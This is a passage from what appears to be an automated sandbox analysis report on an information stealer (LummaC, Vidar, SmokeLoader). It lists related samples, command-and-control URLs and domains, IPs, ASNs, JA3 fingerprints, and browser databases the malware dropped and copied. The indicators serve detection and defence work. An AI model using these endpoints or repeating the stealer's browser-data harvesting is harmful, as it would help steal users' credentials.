                    kCJQaJf3Vs.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                    • trmpc.com/check/index.php
                    file.exeGet hashmaliciousBabuk, DjvuBrowse
                    • habrafa.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                    nJa31W9P4p.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                    • cbinr.com/forum/index.php
                    vegpadg6oW.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                    • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                    rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
                    • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
                    IIBXMzS0zN.exeGet hashmaliciousGlupteba, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                    • sjyey.com/tmp/index.php
                    xIrbQ5rfDu.exeGet hashmaliciousGlupteba, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                    • sjyey.com/tmp/index.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    dbfhns.inPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 62.150.232.50
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 218.152.239.123
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 200.63.106.141
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 187.143.58.5
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 211.119.84.112
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 78.89.199.216
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 58.151.148.90
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 81.183.132.13
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 186.182.55.44
                    3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 190.187.52.42
                    whispedwoodmoodsksl.shopPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.97.3
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.97.3
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.97.3
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.97.3
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.97.3
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    steamcommunity.comPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    file.exeGet hashmaliciousVidarBrowse
                    • 104.102.42.29
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 92.122.104.90
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.197.127.21
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.192.247.89
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.192.247.89

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    TelmexColombiaSACOsKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
                    • 186.147.86.9
                    PFZe10qwTT.elfGet hashmaliciousMiraiBrowse
                    • 190.159.202.149
                    ZVQBodhgp1.elfGet hashmaliciousMirai, MoobotBrowse
                    • 181.60.189.136
                    2T6MGxlKZT.exeGet hashmaliciousSmokeLoaderBrowse
                    • 190.156.239.49
                    bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                    • 200.71.53.77
                    datFGBhnqF.elfGet hashmaliciousMiraiBrowse
                    • 190.143.15.211
                    1.exeGet hashmaliciousPureLog StealerBrowse
                    • 186.145.236.93
                    TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                    • 181.63.193.91
                    4VKc1Xzicz.elfGet hashmaliciousMiraiBrowse
                    • 181.54.25.0
                    Z3xicA0wkm.exeGet hashmaliciousRevengeBrowse
                    • 186.85.86.137
                    SURFAIRWIRELESS-IN-01USPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124
                    BIHNETBIHNETAutonomusSystemBA2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 31.176.197.47
                    1.exeGet hashmaliciousPureLog StealerBrowse
                    • 92.36.226.66
                    kWZnXz2Fw7.elfGet hashmaliciousMiraiBrowse
                    • 109.175.65.208
                    L7WxAhwd3D.elfGet hashmaliciousMiraiBrowse
                    • 92.36.229.121
                    file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
                    • 109.175.29.39
                    LfI5pQnZBu.elfGet hashmaliciousMiraiBrowse
                    • 92.36.229.148
                    Mp7cjtN6To.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                    • 109.175.29.39
                    74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                    • 109.175.29.39
                    SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                    • 109.175.29.39
                    d94i39z585.elfGet hashmaliciousMiraiBrowse
                    • 31.176.226.237
                    AKAMAI-ASUSPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    Mt5VyD087r.elfGet hashmaliciousMiraiBrowse
                    • 184.26.129.238
                    sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
                    • 23.14.155.6
                    Pvq4zSr7yY.elfGet hashmaliciousUnknownBrowse
                    • 23.219.94.224
                    HHzrOvo2d3.elfGet hashmaliciousUnknownBrowse
                    • 23.75.77.51
                    file.exeGet hashmaliciousVidarBrowse
                    • 104.102.42.29
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 92.122.104.90
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    https://uncovered-fragrant-climb.glitch.me/public/eleventy.js.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 23.50.131.157

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e1PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • 188.114.96.3
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 188.114.96.3
                    ZAMOWIEN.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • 188.114.96.3
                    https://docsend.com/view/qqrrvyqndwsixgqgGet hashmaliciousPhisherBrowse
                    • 188.114.96.3
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 188.114.96.3
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    51c64c77e60f3980eea90869b68c58a8PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    file.exeGet hashmaliciousVidarBrowse
                    • 37.27.34.12
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    37f463bf4616ecd445d4a1937da06e19kam.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    las.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    upload.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 104.102.42.29
                    file.exeGet hashmaliciousVidarBrowse
                    • 104.102.42.29
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\ProgramData\FBGIDHCAAKEB\freebl3.dllPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                          Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                            c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                        C:\ProgramData\FBGIDHCAAKEB\mozglue.dllPxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                  QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                      HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                          3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\FBGIDHCAAKEB\AEBKEC

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\BFIIID

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\DAKEHI

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8475592208333753
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                            MD5:BE99679A2B018331EACD3A1B680E3757
                                                            SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                            SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                            SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\ECAEGH

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):159744
                                                            Entropy (8bit):0.5394293526345721
                                                            Encrypted:false
                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\GHDBAF

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.1373607036346451
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                            MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\GIEBAE

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\HIJJEG

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):9976
                                                            Entropy (8bit):5.499944288613473
                                                            Encrypted:false
                                                            SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                            MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                            SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                            SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                            SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                            Malicious:false
                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                            C:\ProgramData\FBGIDHCAAKEB\IDGDAA

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):155648
                                                            Entropy (8bit):0.5407252242845243
                                                            Encrypted:false
                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\IEBAAF

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1209886597424439
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\JJDBFC

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
